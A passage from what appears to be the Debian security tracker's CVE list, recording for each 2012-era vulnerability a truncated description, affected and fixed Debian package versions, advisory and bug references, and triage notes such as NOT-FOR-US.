(XSS) vulnerability in doku.php in DokuWiki ...) - dokuwiki 0.0.20120125a-1 (low; bug #670917) [squeeze] - dokuwiki NOTE: http://secunia.com/advisories/48848/ CVE-2012-2128 (** DISPUTED ** ...) - dokuwiki 0.0.20120125a-1 NOTE: http://bugs.dokuwiki.org/index.php?do=details&task_id=2488 CVE-2012-2127 (fs/proc/root.c in the procfs implementation in the Linux kernel before ...) - linux-2.6 3.2-1 [squeeze] - linux-2.6 (Introduced in 3.1) CVE-2012-2126 RESERVED - rubygems 1.8.24-1 (bug #670228) CVE-2012-2125 RESERVED - rubygems 1.8.24-1 (bug #670228) CVE-2012-2124 (functions/imap_general.php in SquirrelMail, as used in Red Hat ...) - squirrelmail (Incorrect RedHat security update) CVE-2012-2123 (The cap_bprm_set_creds function in security/commoncap.c in the Linux ...) {DSA-2469-1} - linux-2.6 3.2.16-1 CVE-2012-2122 (sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before ...) {DSA-2496-1} - mysql-5.1 (bug #677018) - mysql-5.5 5.5.24+dfsg-1 NOTE: https://www.secmaniac.com/blog/2012/06/11/massive-mysql-authentication-bypass-exploit/ NOTE: http://seclists.org/oss-sec/2012/q2/493 NOTE: Issue only triggered with specific optimisation in glibc enabled; no builds in Debian known to be affected. NOTE: Fixed versions indicate application of upstream patch which prevents issue regardless of opt.settings. CVE-2012-2121 (The KVM implementation in the Linux kernel before 3.3.4 does not ...) {DSA-2668-1} - linux-2.6 3.2.17-1 CVE-2012-2120 (latex2man in texlive-extra-utils 2011.20120322, and possibly other ...) - texlive-extra 2012.20130315-1 (low; bug #668779) [wheezy] - texlive-extra (Minor issue) [squeeze] - texlive-extra (Minor issue) CVE-2012-2119 (Buffer overflow in the macvtap device driver in the Linux kernel ...) - linux 3.2.20-1 [squeeze] - linux-2.6 (Vulnerable code not present, was added in 3.1) CVE-2012-2118 (Format string vulnerability in the LogVHdrMessageVerb function in ...) - xorg-server 2:1.12.1.902-1 (bug #673148) [squeeze] - xorg-server (Introduced in 1.10) NOTE: http://lists.x.org/pipermail/xorg-devel/2012-May/031411.html CVE-2012-2117 (Cross-site scripting (XSS) vulnerability in the Gigya - Social ...) NOT-FOR-US: Drupal plugin (Gigya - Social Optimization) not in Debian CVE-2012-2116 (Cross-site request forgery (CSRF) vulnerability in the Commerce ...) NOT-FOR-US: Drupal plugin (Commerce Reorder) not in Debian CVE-2012-2115 (SQL injection vulnerability in interface/login/validateUser.php in ...) NOT-FOR-US: OpenEMR not in Debian CVE-2012-2114 (Stack-based buffer overflow in fprintf in musl before 0.8.8 and ...) NOT-FOR-US: musl libc not in Debian CVE-2012-2113 (Multiple integer overflows in tiff2pdf in libtiff before 4.0.2 allow ...) {DSA-2552-1} - tiff 4.0.2-1 (bug #678140) - tiff3 (The tiff-tools package is only built from the tiff source package) CVE-2012-2112 (Cross-site scripting (XSS) vulnerability in the Exception Handler in ...) {DSA-2455-1} - typo3-src 4.5.15+dfsg1-1 (bug #669158) NOTE: http://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2012-002/ CVE-2012-2111 (The (1) CreateAccount, (2) OpenAccount, (3) AddAccountRights, and (4) ...) {DSA-2463-1} - samba 2:3.6.5-1 NOTE: http://www.samba.org/samba/history/samba-3.6.5.html NOTE: According to the release notes Samba 3.4.x to 3.6.4 are affected CVE-2012-2110 (The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in OpenSSL ...) {DSA-2454-1} - openssl 1.0.1a-1 NOTE: http://www.openssl.org/news/secadv_20120419.txt CVE-2012-2109 (SQL injection vulnerability in wp-load.php in the BuddyPress plugin ...) NOT-FOR-US: wordpress buddypress plugin CVE-2012-2108 RESERVED - csound 1:5.17.6~dfsg-1 (low; bug #661197) [squeeze] - csound (Minor issue) CVE-2012-2107 RESERVED - csound 1:5.17.6~dfsg-1 (bug #661197) [squeeze] - csound (Minor issue) CVE-2012-2106 RESERVED - csound 1:5.17.6~dfsg-1 (bug #661197) [squeeze] - csound (Minor issue) CVE-2012-2105 (Multiple SQL injection vulnerabilities in login.php in Timesheet Next ...) NOT-FOR-US: tsheetx CVE-2012-2104 (cgi-bin/munin-cgi-graph in Munin 2.x writes data to a log file without ...) - munin 2.0~rc6-1 (bug #668666) [squeeze] - munin (Vulnerable code not present) [lenny] - munin (Vulnerable code not present) CVE-2012-2103 (The qmailscan plugin for Munin 1.4.5 allows local users to overwrite ...) - munin 2.0~rc6-1 (bug #668778) [squeeze] - munin (Vulnerable code not present) [lenny] - munin (Vulnerable code not present) CVE-2012-2102 (MySQL 5.1.x before 5.1.62 and 5.5.x before 5.5.22 allows remote ...) {DSA-2496-1} - mysql-5.1 5.1.62-1 (low; bug #670636) - mysql-5.5 5.5.24+dfsg-1 (low) CVE-2012-2101 (Openstack Compute (Nova) Folsom, 2012.1, and 2011.3 does not limit the ...) - nova 2012.1-2 (bug #670637) CVE-2012-2100 (The ext4_fill_flex_info function in fs/ext4/super.c in the Linux ...) - linux-2.6 3.2.2-1 [squeeze] - linux-2.6 2.6.32-41squeeze1 NOTE: incomplete fix of CVE-2009-4307, introducing another issue: NOTE: https://lkml.org/lkml/2012/2/20/422 CVE-2012-2099 (Multiple cross-site scripting (XSS) vulnerabilities in Wikidforum 2.10 ...) NOT-FOR-US: Wikidforum CVE-2012-2098 (Algorithmic complexity vulnerability in the sorting algorithms in ...) - libcommons-compress-java 1.4.1-1 (low; bug #674448) [squeeze] - libcommons-compress-java (Minor issue) CVE-2012-2097 (Cross-site request forgery (CSRF) vulnerability in the Autosave module ...) NOT-FOR-US: Drupal module Autosave CVE-2012-2096 (The Fivestar module 6.x-1.x before 6.x-1.20 for Drupal does not ...) NOT-FOR-US: Drupal module Fivestar CVE-2012-2094 (Cross-site scripting (XSS) vulnerability in the refresh mechanism in ...) - horizon 2012.1-3 CVE-2012-2093 (src/common/latex.py in Gajim 0.15 allows local users to overwrite ...) {DSA-2453-2 DSA-2453-1} - gajim 0.15-1.1 (low; bug #668710) CVE-2012-2092 RESERVED - cobbler (bug #545583) CVE-2012-2091 (Multiple buffer overflows in FlightGear 2.6 and earlier and SimGear ...) - flightgear 2.6.0-1.1 (unimportant; bug #669025) NOTE: Negligable security impact, very obscure attack vector CVE-2012-2090 (Multiple format string vulnerabilities in FlightGear 2.6 and earlier ...) - simgear (unimportant; bug #669024) - flightgear 2.6.0-1.1 (unimportant; bug #669025) NOTE: Negligable security impact, very obscure attack vector CVE-2012-2089 (Buffer overflow in ngx_http_mp4_module.c in the ngx_http_mp4_module ...) - nginx 1.1.19-1 [squeeze] - nginx (Vulnerable code not present) CVE-2012-2088 (Integer signedness error in the TIFFReadDirectory function in ...) {DSA-2552-1} - tiff 4.0-1 (bug #678140) - tiff3 3.9.6-6 CVE-2012-2087 RESERVED CVE-2012-2086 (SQL injection vulnerability in the get_last_conversation_lines ...) {DSA-2453-2 DSA-2453-1} - gajim 0.15-1 (low; bug #668038) CVE-2012-2085 (The exec_command function in common/helpers.py in Gajim before 0.15 ...) {DSA-2453-2 DSA-2453-1} - gajim 0.15-1 (medium; bug #668038) CVE-2012-2084 (Cross-site scripting (XSS) vulnerability in the Printer, email and PDF ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-2083 (Cross-site scripting (XSS) vulnerability in the ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-2082 (Cross-site scripting (XSS) vulnerability in the Chaos tool suite (aka ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-2081 (The Organic Groups (OG) module 6.x-2.x before 6.x-2.3 for Drupal does ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-2080 (Cross-site request forgery (CSRF) vulnerability in the Node Limit ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-2079 RESERVED NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-2078 RESERVED NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-2077 (Cross-site request forgery (CSRF) vulnerability in the ShareThis ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-2076 (Cross-site scripting (XSS) vulnerability in the administration forms ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-2075 (Cross-site scripting (XSS) vulnerability in the Contact Save module ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-2074 (Unspecified vulnerability in certain default views in the Ubercart ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-2073 (The Bundle copy module 7.x-1.x before 7.x-1.1 for Drupal does not ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-2072 (Cross-site scripting (XSS) vulnerability in the Share Buttons ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-2071 (Cross-site scripting (XSS) vulnerability in the Contact Forms module ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-2070 (Cross-site scripting (XSS) vulnerability in the MultiBlock module ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-2069 (Cross-site request forgery (CSRF) vulnerability in the Wishlist module ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-2068 (Multiple cross-site scripting (XSS) vulnerabilities in ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-2067 (Unspecified vulnerability in the CKeditor module 6.x-2.x before ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-2066 (Cross-site scripting (XSS) vulnerability in the FCKeditor module ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-2065 (Cross-site scripting (XSS) vulnerability in the Language Icons module ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-2064 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-2063 (The Slidebox module before 7.x-1.4 for Drupal does not properly check ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-2062 (Open redirect vulnerability in the Redirecting click bouncer module ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-2061 (Cross-site request forgery (CSRF) vulnerability in the Admin tools ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-2060 (Cross-site scripting (XSS) vulnerability in the Admin tools module for ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-2059 (Cross-site scripting (XSS) vulnerability in the ticketyboo News Ticker ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-2058 (The Ubercart Payflow module for Drupal does not use a secure token, ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-2057 (Cross-site request forgery (CSRF) vulnerability in the Ubercart Bulk ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-2056 (Cross-site request forgery (CSRF) vulnerability in the Content Lock ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2008-7311 (The session cookie store implementation in Spree 0.2.0 uses a ...) NOT-FOR-US: Spree CVE-2008-7310 (Spree 0.2.0 does not properly restrict the use of a hash to provide ...) NOT-FOR-US: Spree CVE-2008-7309 (Insoshi before 20080920 does not properly restrict the use of a hash ...) NOT-FOR-US: Insoshi CVE-2012-2055 (GitHub Enterprise before 20120304 does not properly restrict the use ...) NOT-FOR-US: GitHub Enterprise CVE-2012-2054 (Redmine before 1.3.2 does not properly restrict the use of a hash to ...) - redmine 1.3.2+dfsg1-1 CVE-2012-2053 (The sudoers file in the Linux system configuration in F5 FirePass ...) NOT-FOR-US: F5 Firepass CVE-2012-2052 RESERVED CVE-2012-2051 (Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on ...) NOT-FOR-US: Adobe Reader CVE-2012-2050 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x ...) NOT-FOR-US: Adobe Reader CVE-2012-2049 (Stack-based buffer overflow in Adobe Reader and Acrobat 9.x before ...) NOT-FOR-US: Adobe Reader CVE-2012-2048 (Unspecified vulnerability in Adobe ColdFusion 10 and earlier allows ...) NOT-FOR-US: Adobe ColdFusion CVE-2012-2047 (Adobe Shockwave Player before 11.6.6.636 allows attackers to execute ...) NOT-FOR-US: Adobe Shockwave Player CVE-2012-2046 (Adobe Shockwave Player before 11.6.6.636 allows attackers to execute ...) NOT-FOR-US: Adobe Shockwave Player CVE-2012-2045 (Adobe Shockwave Player before 11.6.6.636 allows attackers to execute ...) NOT-FOR-US: Adobe Shockwave Player CVE-2012-2044 (Adobe Shockwave Player before 11.6.6.636 allows attackers to execute ...) NOT-FOR-US: Adobe Shockwave Player CVE-2012-2043 (Adobe Shockwave Player before 11.6.6.636 allows attackers to execute ...) NOT-FOR-US: Adobe Shockwave Player CVE-2012-2042 (Adobe Illustrator before CS6 allows attackers to execute arbitrary ...) NOT-FOR-US: Adobe Illustrator CVE-2012-2041 (CRLF injection vulnerability in the Component Browser in Adobe ...) NOT-FOR-US: Adobe ColdFusion CVE-2012-2040 (Untrusted search path vulnerability in the installer in Adobe Flash ...) NOT-FOR-US: Adobe Flash CVE-2012-2039 (Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on ...) NOT-FOR-US: Adobe Flash CVE-2012-2038 (Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on ...) NOT-FOR-US: Adobe Flash CVE-2012-2037 (Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on ...) NOT-FOR-US: Adobe Flash CVE-2012-2036 (Integer overflow in Adobe Flash Player before 10.3.183.20 and 11.x ...) NOT-FOR-US: Adobe Flash CVE-2012-2035 (Stack-based buffer overflow in Adobe Flash Player before 10.3.183.20 ...) NOT-FOR-US: Adobe Flash CVE-2012-2034 (Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on ...) NOT-FOR-US: Adobe Flash CVE-2012-2033 (Adobe Shockwave Player before 11.6.5.635 allows attackers to execute ...) NOT-FOR-US: Adobe Shockwave Player CVE-2012-2032 (Adobe Shockwave Player before 11.6.5.635 allows attackers to execute ...) NOT-FOR-US: Adobe Shockwave Player CVE-2012-2031 (Adobe Shockwave Player before 11.6.5.635 allows attackers to execute ...) NOT-FOR-US: Adobe Shockwave Player CVE-2012-2030 (Adobe Shockwave Player before 11.6.5.635 allows attackers to execute ...) NOT-FOR-US: Adobe Shockwave Player CVE-2012-2029 (Adobe Shockwave Player before 11.6.5.635 allows attackers to execute ...) NOT-FOR-US: Adobe Shockwave Player CVE-2012-2028 (Buffer overflow in Adobe Photoshop before CS6 allows remote attackers ...) NOT-FOR-US: Adobe Photoshop CVE-2012-2027 (Use-after-free vulnerability in Adobe Photoshop before CS6 allows ...) NOT-FOR-US: Adobe Photoshop CVE-2012-2026 (Adobe Illustrator before CS6 allows attackers to execute arbitrary ...) NOT-FOR-US: Adobe Illustrator CVE-2012-2025 (Adobe Illustrator before CS6 allows attackers to execute arbitrary ...) NOT-FOR-US: Adobe Illustrator CVE-2012-2024 (Adobe Illustrator before CS6 allows attackers to execute arbitrary ...) NOT-FOR-US: Adobe Illustrator CVE-2012-2023 (Adobe Illustrator before CS6 allows attackers to execute arbitrary ...) NOT-FOR-US: Adobe Illustrator CVE-2012-2022 (Multiple cross-site scripting (XSS) vulnerabilities in HP Network Node ...) NOT-FOR-US: HP Network Node Manager CVE-2012-2021 (Multiple cross-site scripting (XSS) vulnerabilities in HP AssetManager ...) NOT-FOR-US: HP AssetManager CVE-2012-2020 (Unspecified vulnerability in HP Operations Agent before 11.03.12 ...) NOT-FOR-US: HP Operations Agent CVE-2012-2019 (Unspecified vulnerability in HP Operations Agent before 11.03.12 ...) NOT-FOR-US: HP Operations Agent CVE-2012-2018 (Cross-site scripting (XSS) vulnerability in HP Network Node Manager i ...) NOT-FOR-US: HP Network Node Manager CVE-2012-2017 (Unspecified vulnerability on HP Photosmart Wireless e-All-in-One B110, ...) NOT-FOR-US: HP Photosmart Wireless e-All-in-One CVE-2012-2016 (Unspecified vulnerability in HP System Management Homepage (SMH) ...) NOT-FOR-US: HP System Management Homepage CVE-2012-2015 (Unspecified vulnerability in HP System Management Homepage (SMH) ...) NOT-FOR-US: HP System Management Homepage CVE-2012-2014 (HP System Management Homepage (SMH) before 7.1.1 does not properly ...) NOT-FOR-US: HP System Management Homepage CVE-2012-2013 (Unspecified vulnerability in HP System Management Homepage (SMH) ...) NOT-FOR-US: HP System Management Homepage CVE-2012-2012 (HP System Management Homepage (SMH) before 7.1.1 does not have an off ...) NOT-FOR-US: HP System Management Homepage CVE-2012-2011 (Multiple cross-site scripting (XSS) vulnerabilities in HP Web Jetadmin ...) NOT-FOR-US: HP Web Jetadmin CVE-2012-2010 (The ACMELOGIN implementation in HP OpenVMS 8.3 and 8.4 on the Alpha ...) NOT-FOR-US: OpenVMS CVE-2012-2009 (Unspecified vulnerability in HP Performance Insight for Networks ...) NOT-FOR-US: HP Performance Insight CVE-2012-2008 (Cross-site scripting (XSS) vulnerability in HP Performance Insight for ...) NOT-FOR-US: HP Performance Insight CVE-2012-2007 (SQL injection vulnerability in HP Performance Insight for Networks ...) NOT-FOR-US: HP Performance Insight CVE-2012-2006 (Unspecified vulnerability in HP Insight Management Agents before ...) NOT-FOR-US: Proprietary HP monitoring tools CVE-2012-2005 (Cross-site scripting (XSS) vulnerability in HP Insight Management ...) NOT-FOR-US: Proprietary HP monitoring tools CVE-2012-2004 (Open redirect vulnerability in HP Insight Management Agents before ...) NOT-FOR-US: Proprietary HP monitoring tools CVE-2012-2003 (Cross-site request forgery (CSRF) vulnerability in HP Insight ...) NOT-FOR-US: Proprietary HP monitoring tools CVE-2012-2002 (Open redirect vulnerability in HP SNMP Agents for Linux before 9.0.0 ...) NOT-FOR-US: Proprietary HP monitoring tools CVE-2012-2001 (Cross-site scripting (XSS) vulnerability in HP SNMP Agents for Linux ...) NOT-FOR-US: Proprietary HP monitoring tools CVE-2012-2000 (Multiple unspecified vulnerabilities in HP System Health Application ...) NOT-FOR-US: Proprietary HP monitoring tools CVE-2012-1999 (Unspecified vulnerability in HP Systems Insight Manager (SIM) before ...) NOT-FOR-US: HP Systems Insight Manager CVE-2012-1998 (Unspecified vulnerability in HP Systems Insight Manager (SIM) before ...) NOT-FOR-US: HP Systems Insight Manager CVE-2012-1997 (Unspecified vulnerability in HP Systems Insight Manager (SIM) before ...) NOT-FOR-US: HP Systems Insight Manager CVE-2012-1996 (Unspecified vulnerability in HP Systems Insight Manager (SIM) before ...) NOT-FOR-US: HP Systems Insight Manager CVE-2012-1995 (Unspecified vulnerability in HP Systems Insight Manager (SIM) before ...) NOT-FOR-US: HP Systems Insight Manager CVE-2012-1994 RESERVED CVE-2012-1993 (Unspecified vulnerability in HP System Management Homepage (SMH) ...) NOT-FOR-US: HP System Management Homepage CVE-2012-1992 (Cross-site scripting (XSS) vulnerability in admin/edituser.php in CMS ...) NOT-FOR-US: CMD Made Simple CVE-2012-1991 RESERVED CVE-2012-1990 (Multiple cross-site scripting (XSS) vulnerabilities in Schneider ...) NOT-FOR-US: Schneider Electric Kerweb CVE-2012-1989 (telnet.rb in Puppet 2.7.x before 2.7.13 and Puppet Enterprise (PE) ...) - puppet 2.7.13-1 [squeeze] - puppet (Only affects 2.7.x) CVE-2012-1988 (Puppet 2.6.x before 2.6.15 and 2.7.x before 2.7.13, and Puppet ...) {DSA-2451-1} - puppet 2.7.13-1 CVE-2012-1987 (Unspecified vulnerability in Puppet 2.6.x before 2.6.15 and 2.7.x ...) {DSA-2451-1} - puppet 2.7.13-1 CVE-2012-1986 (Puppet 2.6.x before 2.6.15 and 2.7.x before 2.7.13, and Puppet ...) {DSA-2451-1} - puppet 2.7.13-1 CVE-2011-5085 (Unspecified vulnerability in Movable Type 4.x before 4.36 and 5.x ...) {DSA-2423-1} - movabletype-opensource 5.1.2+dfsg-1 CVE-2011-5084 (Cross-site scripting (XSS) vulnerability in Movable Type 4.x before ...) {DSA-2423-1} - movabletype-opensource 5.1.2+dfsg-1 CVE-2012-1985 (Cross-site request forgery (CSRF) vulnerability in RealNetworks Helix ...) NOT-FOR-US: RealNetworks Helix CVE-2012-1984 (Multiple cross-site scripting (XSS) vulnerabilities in RealNetworks ...) NOT-FOR-US: RealNetworks Helix CVE-2012-1983 RESERVED CVE-2012-1982 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: SocialCMS CVE-2012-1981 RESERVED CVE-2012-1980 RESERVED CVE-2012-1979 (Cross-site scripting (XSS) vulnerability in starnet/index.php in ...) NOT-FOR-US: SyndeoCMS CVE-2012-1978 RESERVED CVE-2012-1977 (WellinTech KingSCADA 3.0 uses a cleartext base64 format for storage of ...) NOT-FOR-US: WellinTech KingSCADA CVE-2012-1976 (Use-after-free vulnerability in the ...) {DSA-2556-1 DSA-2554-1 DSA-2553-1} - iceweasel 10.0.7esr-1 - icedove 10.0.7-1 - iceape 2.7.7-1 CVE-2012-1975 (Use-after-free vulnerability in the PresShell::CompleteMove function ...) {DSA-2556-1 DSA-2554-1 DSA-2553-1} - iceweasel 10.0.7esr-1 - icedove 10.0.7-1 - iceape 2.7.7-1 CVE-2012-1974 (Use-after-free vulnerability in the gfxTextRun::CanBreakLineBefore ...) {DSA-2556-1 DSA-2554-1 DSA-2553-1} - iceweasel 10.0.7esr-1 - icedove 10.0.7-1 - iceape 2.7.7-1 CVE-2012-1973 (Use-after-free vulnerability in the nsObjectLoadingContent::LoadObject ...) {DSA-2556-1 DSA-2554-1 DSA-2553-1} - iceweasel 10.0.7esr-1 - icedove 10.0.7-1 - iceape 2.7.7-1 CVE-2012-1972 (Use-after-free vulnerability in the ...) {DSA-2556-1 DSA-2554-1 DSA-2553-1} - iceweasel 10.0.7esr-1 - icedove 10.0.7-1 - iceape 2.7.7-1 CVE-2012-1971 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) - iceweasel (Only affects Firefox >= 10) CVE-2012-1970 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) {DSA-2556-1 DSA-2554-1 DSA-2553-1} - iceweasel 10.0.7esr-1 - iceape 2.7.7-1 CVE-2012-1969 (The get_attachment_link function in Template.pm in Bugzilla 2.x and ...) - bugzilla (low) - bugzilla4 (bug #669643) [squeeze] - bugzilla (Minor issue) CVE-2012-1968 (Bugzilla 4.1.x and 4.2.x before 4.2.2 and 4.3.x before 4.3.2 uses ...) - bugzilla (Only affects 4.1 to 4.3) - bugzilla4 (bug #669643) CVE-2012-1967 (Mozilla Firefox 4.x through 13.0, Firefox ESR 10.x before 10.0.6, ...) {DSA-2528-1 DSA-2514-1 DSA-2513-1} - iceweasel 10.0.6esr-1 - icedove 10.0.6-1 - iceape 2.7.6-1 CVE-2012-1966 (Mozilla Firefox 4.x through 13.0 and Firefox ESR 10.x before 10.0.6 do ...) {DSA-2514-1} - iceweasel 10.0.6esr-1 CVE-2012-1965 (Mozilla Firefox 4.x through 13.0 and Firefox ESR 10.x before 10.0.6 do ...) - iceweasel 10.0.6esr-1 CVE-2012-1964 (The certificate-warning functionality in ...) - iceweasel 10.0.6esr-1 - icedove 10.0.6-1 - iceape 2.7.6-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceape (Vulnerable code not present) CVE-2012-1963 (The Content Security Policy (CSP) functionality in Mozilla Firefox 4.x ...) - iceweasel 10.0.6esr-1 [squeeze] - iceweasel (CSP not yet available) - icedove 10.0.5-1 [squeeze] - icedove (CSP not yet available) - icedove 10.0.6-1 - iceape 2.7.6-1 CVE-2012-1962 (Use-after-free vulnerability in the JSDependentString::undepend ...) - iceweasel 10.0.6esr-1 - icedove 10.0.6-1 - iceape 2.7.6-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceape (Vulnerable code not present) CVE-2012-1961 (Mozilla Firefox 4.x through 13.0, Firefox ESR 10.x before 10.0.6, ...) - iceweasel 10.0.6esr-1 - icedove 10.0.6-1 - iceape 2.7.6-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceape (Vulnerable code not present) CVE-2012-1960 (The qcms_transform_data_rgb_out_lut_sse2 function in the QCMS ...) - iceweasel (Only affects Firefox > 10) CVE-2012-1959 (Mozilla Firefox 4.x through 13.0, Firefox ESR 10.x before 10.0.6, ...) - iceweasel 10.0.6esr-1 - icedove 10.0.6-1 - iceape 2.7.6-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceape (Vulnerable code not present) CVE-2012-1958 (Use-after-free vulnerability in the nsGlobalWindow::PageHidden ...) - iceweasel 10.0.6esr-1 - icedove 10.0.6-1 - iceape 2.7.6-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceape (Vulnerable code not present) CVE-2012-1957 (An unspecified parser-utility class in Mozilla Firefox 4.x through ...) - iceweasel 10.0.6esr-1 - icedove 10.0.6-1 - iceape 2.7.6-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceape (Vulnerable code not present) CVE-2012-1956 (Mozilla Firefox before 15.0, Thunderbird before 15.0, and SeaMonkey ...) - iceweasel (Only affects Firefox >= 10) - icedove (Only affects Firefox >= 10) - iceape (Only affects Firefox >= 10) CVE-2012-1955 (Mozilla Firefox 4.x through 13.0, Firefox ESR 10.x before 10.0.6, ...) - iceweasel 10.0.6esr-1 - icedove 10.0.6-1 - iceape 2.7.6-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceape (Vulnerable code not present) CVE-2012-1954 (Use-after-free vulnerability in the nsDocument::AdoptNode function in ...) {DSA-2528-1 DSA-2514-1 DSA-2513-1} - iceweasel 10.0.6esr-1 - icedove 10.0.6-1 - iceape 2.7.6-1 CVE-2012-1953 (The ElementAnimations::EnsureStyleRuleFor function in Mozilla Firefox ...) - iceweasel 10.0.6esr-1 - icedove 10.0.6-1 - iceape 2.7.6-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceape (Vulnerable code not present) CVE-2012-1952 (The nsTableFrame::InsertFrames function in Mozilla Firefox 4.x through ...) - iceweasel 10.0.6esr-1 - icedove 10.0.6-1 - iceape 2.7.6-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceape (Vulnerable code not present) CVE-2012-1951 (Use-after-free vulnerability in the nsSMILTimeValueSpec::IsEventBased ...) - iceweasel 10.0.6esr-1 - icedove 10.0.6-1 - iceape 2.7.6-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceape (Vulnerable code not present) CVE-2012-1950 (The drag-and-drop implementation in Mozilla Firefox 4.x through 13.0 ...) {DSA-2528-1 DSA-2514-1} - iceweasel 10.0.6esr-1 CVE-2012-1949 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) - iceweasel (Only affects Firefox 13) CVE-2012-1948 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) {DSA-2528-1 DSA-2514-1 DSA-2513-1} - iceweasel 10.0.6esr-1 - icedove 10.0.6-1 - iceape 2.7.6-1 CVE-2012-1947 (Heap-based buffer overflow in the utf16_to_isolatin1 function in ...) {DSA-2499-1 DSA-2489-1 DSA-2488-1} - iceweasel 10.0.5esr-1 - icedove 10.0.5-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) CVE-2012-1946 (Use-after-free vulnerability in the nsINode::ReplaceOrInsertBefore ...) - iceweasel 10.0.5esr-1 - icedove 10.0.5-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) CVE-2012-1945 (Mozilla Firefox 4.x through 12.0, Firefox ESR 10.x before 10.0.5, ...) - iceweasel 10.0.5esr-1 - icedove 10.0.5-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) CVE-2012-1944 (The Content Security Policy (CSP) implementation in Mozilla Firefox ...) - iceweasel 10.0.5esr-1 [squeeze] - iceweasel (CSP not yet available) - icedove 10.0.5-1 [squeeze] - icedove (CSP not yet available) CVE-2012-1943 (Untrusted search path vulnerability in Updater.exe in the Windows ...) - iceweasel (windows-specific) CVE-2012-1942 (The Mozilla Updater and Windows Updater Service in Mozilla Firefox ...) - iceweasel (windows-specific) CVE-2012-1941 (Heap-based buffer overflow in the ...) - iceweasel 10.0.5esr-1 - icedove 10.0.5-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) CVE-2012-1940 (Use-after-free vulnerability in the nsFrameList::FirstChild function ...) {DSA-2499-1 DSA-2489-1 DSA-2488-1} - iceweasel 10.0.5esr-1 - icedove 10.0.5-1 CVE-2012-1939 (jsinfer.cpp in Mozilla Firefox ESR 10.x before 10.0.5 and Thunderbird ...) - iceweasel 10.0.5esr-1 - icedove 10.0.5-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) CVE-2012-1938 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) - iceweasel (Only affects iceweasel from experimental) CVE-2012-1937 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) {DSA-2499-1 DSA-2489-1 DSA-2488-1} - iceweasel 10.0.5esr-1 - icedove 10.0.5-1 CVE-2012-1936 (** DISPUTED ** The wp_create_nonce function in ...) NOT-FOR-US: Disputed Wordpress issue CVE-2012-1935 (Multiple cross-site scripting (XSS) vulnerabilities in Newscoop 3.5.x ...) - newscoop (bug #604113) CVE-2012-1934 (SQL injection vulnerability in admin/country/edit.php in Newscoop ...) - newscoop (bug #604113) 